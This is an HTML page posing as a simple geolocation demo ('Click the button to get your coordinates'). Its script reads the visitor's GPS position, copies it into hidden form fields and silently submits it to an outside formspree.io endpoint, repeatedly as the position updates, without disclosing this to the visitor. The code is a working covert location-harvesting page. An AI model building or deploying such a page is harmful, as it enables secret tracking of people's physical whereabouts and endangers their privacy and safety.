<!DOCTYPE html>
<html lang="en">
<head>
  <title>GetGPS</title>
  <style>
    :root {
      --fire: rgb(209, 66, 66);
    }
    .button_get_gps {
      cursor: pointer;
      border-radius: 5px;
      padding: 5px 10px 5px 10px;
      border: 2px solid var(--fire);
      background-color: rgba(255, 140, 0, 0.329);
      color: black;
      font-weight: 700;
      transition: .5s;
      font-family: 'Trebuchet MS', 'Lucida Sans Unicode', 'Lucida Grande', 'Lucida Sans', Arial, sans-serif;
    }
    .button_get_gps:hover {
      transform: scale(1.2);
      border: 2px dotted green;
      background-color: rgba(0, 255, 55, 0.329);
      color: green;
    }
  </style>
</head>
<body>
  <h1>HTML Geolocation</h1>
  <p>Click the button to get your coordinates.</p>

  <form action="https://formspree.io/f/xyyrkvqg" method="POST">
    <button class="button_get_gps" onclick="getLocation()">Try It</button>
    <input type="hidden" id="latitude" name="latitude" value="">
    <input type="hidden" id="longitude" name="longitude" value="">
  </form>

  <p id="input_gps"></p>

  <script>
    const x = document.getElementById("input_gps");
    const latitudeInput = document.getElementById("latitude");
    const longitudeInput = document.getElementById("longitude");

    function getLocation() {
      if (navigator.geolocation) {
        navigator.geolocation.watchPosition(showPosition);
      } else { 
        x.innerHTML = "Geolocation is not supported by this browser.";
      }
    }

    function showPosition(position) {
      const latitude = position.coords.latitude;
      const longitude = position.coords.longitude;

      // Обновляем ссылку с использованием полученных координат на Google Maps
      const updatedLink = `https://www.google.com/maps?q=${latitude},${longitude}`;
      
      // Выводим координаты и обновленную ссылку
      x.innerHTML = `Latitude: ${latitude}<br>Longitude: ${longitude}<br>Updated Link: <a href="${updatedLink}" target="_blank">${updatedLink}</a>`;

      // Заполняем скрытые поля формы
      latitudeInput.value = latitude;
      longitudeInput.value = longitude;

      // Отправляем форму на сервер
      document.forms[0].submit();
    }
  </script>
</body>
</html>